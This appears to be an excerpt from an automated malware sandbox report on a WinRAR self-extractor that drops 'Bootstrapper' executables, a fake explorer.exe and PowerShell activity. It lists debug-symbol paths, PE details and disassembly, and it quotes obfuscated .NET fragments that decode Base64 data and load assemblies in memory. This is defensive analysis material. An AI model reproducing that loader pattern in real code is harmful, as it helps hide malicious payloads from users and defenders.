                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdb source: BootstrapperV1.22.exe, 00000008.00000002.2553192418.000001ACA6C49000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbmui source: BootstrapperV21.exe, 00000002.00000002.4870582452.000000001C3E0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4851659921.000000001B690000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: 8svMXMXNRn.exe, 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmp, 8svMXMXNRn.exe, 00000000.00000003.2031085342.000001E9E40EE000.00000004.00000020.00020000.00000000.sdmp, 8svMXMXNRn.exe, 00000000.00000003.2029686110.000001E9E5746000.00000004.00000020.00020000.00000000.sdmp, 8svMXMXNRn.exe, 00000000.00000000.2028449384.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: voosiq.exe, 00000021.00000002.3973688259.00007FF789DEB000.00000002.00000001.01000000.00000015.sdmp, voosiq.exe, 00000021.00000000.3933474079.00007FF789DEB000.00000002.00000001.01000000.00000015.sdmp
                      Source: Binary string: gC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000048C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: indoC:\Windows\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: nC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: }C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E8A2000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000048C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: zC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: xC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.pdb source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E8A2000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbvR source: BootstrapperV21.exe, 00000002.00000002.4870582452.000000001C3E0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: 8svMXMXNRn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 8svMXMXNRn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 8svMXMXNRn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 8svMXMXNRn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 8svMXMXNRn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: BootstrapperV21.exe.0.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ.v2XfmFsyHRfPxcImAzkpkpn49rYRGigAOIzycPLRf44QfCovUapwa6gDjbhiFOSY5O7ExZFjq615lc6CND9csZ,_5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ.OQCeyrGv3i5ThcIflQoSH9M8O1XxczU4rEEBY28BL99FO19sfoYxRE1gOFNOZBagZl1O27I4Iml80YecIdpnHD,_5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ._6GPuzz0D0MHs47HPbLmSjuj0EGBM1mnJzfcghxR0pJuho3SWaHALAA90nxFAzORt9AnDKxkkQufLb09yPacyry,_5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ.zfVQtLKqqq5yxzMVX0i0rVzQczB3qOvYAnivZy783waVNmQ36Rg6zDJ31W95zbOrehvv7L23Dy42onVyMhHGfx,SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.Qcr6Eye3s4o5XjKyyAe9UMuvHCQCMcu1AsG6R6YCqrlslWXCiDe2pnTt4mk2D()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: BootstrapperV21.exe.0.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_1h7BYoYraAF9kb5l5pn7AljHhsRB7[2],SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.c8RRnlVK0D13cgUlgCsRoFaISJ1fLYlvvM7ks5KQUasm3Gqy7EO2kEoE9oeGJ(Convert.FromBase64String(_1h7BYoYraAF9kb5l5pn7AljHhsRB7[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: BootstrapperV21.exe.0.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { _1h7BYoYraAF9kb5l5pn7AljHhsRB7[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: explorer.exe.2.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ.v2XfmFsyHRfPxcImAzkpkpn49rYRGigAOIzycPLRf44QfCovUapwa6gDjbhiFOSY5O7ExZFjq615lc6CND9csZ,_5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ.OQCeyrGv3i5ThcIflQoSH9M8O1XxczU4rEEBY28BL99FO19sfoYxRE1gOFNOZBagZl1O27I4Iml80YecIdpnHD,_5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ._6GPuzz0D0MHs47HPbLmSjuj0EGBM1mnJzfcghxR0pJuho3SWaHALAA90nxFAzORt9AnDKxkkQufLb09yPacyry,_5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ.zfVQtLKqqq5yxzMVX0i0rVzQczB3qOvYAnivZy783waVNmQ36Rg6zDJ31W95zbOrehvv7L23Dy42onVyMhHGfx,SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.Qcr6Eye3s4o5XjKyyAe9UMuvHCQCMcu1AsG6R6YCqrlslWXCiDe2pnTt4mk2D()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: explorer.exe.2.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_1h7BYoYraAF9kb5l5pn7AljHhsRB7[2],SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.c8RRnlVK0D13cgUlgCsRoFaISJ1fLYlvvM7ks5KQUasm3Gqy7EO2kEoE9oeGJ(Convert.FromBase64String(_1h7BYoYraAF9kb5l5pn7AljHhsRB7[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: explorer.exe.2.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { _1h7BYoYraAF9kb5l5pn7AljHhsRB7[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      .NET source code contains potential unpacker
                      Source: BootstrapperV21.exe.0.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: PF8902c0ggCmm2TE6DSjEZBlM5DZz System.AppDomain.Load(byte[])
                      Source: BootstrapperV21.exe.0.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: AcZjfpbBxjO6wVkrSrK2mA5NMDPQo System.AppDomain.Load(byte[])
                      Source: BootstrapperV21.exe.0.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: AcZjfpbBxjO6wVkrSrK2mA5NMDPQo
                      Source: explorer.exe.2.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: PF8902c0ggCmm2TE6DSjEZBlM5DZz System.AppDomain.Load(byte[])
                      Source: explorer.exe.2.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: AcZjfpbBxjO6wVkrSrK2mA5NMDPQo System.AppDomain.Load(byte[])
                      Source: explorer.exe.2.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.cs.Net Code: AcZjfpbBxjO6wVkrSrK2mA5NMDPQo
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6729546Jump to behavior
                      Source: 8svMXMXNRn.exeStatic PE information: section name: .didat
                      Source: 8svMXMXNRn.exeStatic PE information: section name: _RDATA
                      Source: voosiq.exe.2.drStatic PE information: section name: .didat
                      Source: voosiq.exe.2.drStatic PE information: section name: _RDATA
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373D5156 push rsi; retf 0_2_00007FF6373D5157
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373D5166 push rsi; retf 0_2_00007FF6373D5167
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C400BD pushad ; iretd 2_2_00007FF848C400C1
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C4DE45 push ebx; retn 5F52h3_2_00007FF848C4E0FA
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C4D9AA push ebp; retf 3_2_00007FF848C4DB40
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C37913 push ebx; retf 3_2_00007FF848C3796A
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C462F5 push ss; retn 5F4Ch3_2_00007FF848C46317
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C4DA99 push ebp; retf 3_2_00007FF848C4DB40
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C36253 push es; retn 5F4Dh3_2_00007FF848C36327
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C3842E pushad ; ret 3_2_00007FF848C3845D
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C49C25 push 8B48FFEEh; iretd 3_2_00007FF848C49C2A
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C3552C push ebp; iretd 3_2_00007FF848C35538
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C300BD pushad ; iretd 3_2_00007FF848C300C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848B0D2A5 pushad ; iretd 5_2_00007FF848B0D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C200BD pushad ; iretd 5_2_00007FF848C200C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF15DD push ss; iretd 5_2_00007FF848CF1632
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF0553 push es; iretd 5_2_00007FF848CF055A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF4F63 push ecx; iretd 5_2_00007FF848CF4F6A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF5163 push ebx; iretd 5_2_00007FF848CF516A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF5160 push ecx; iretd 5_2_00007FF848CF5162
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF2316 push 8B485F94h; iretd 5_2_00007FF848CF231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF9C81 pushfd ; iretd 5_2_00007FF848CF9CD2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF06A5 push es; iretd 5_2_00007FF848CF06F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF5453 push esi; iretd 5_2_00007FF848CF545A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF2E11 push eax; iretd 5_2_00007FF848CF2E61
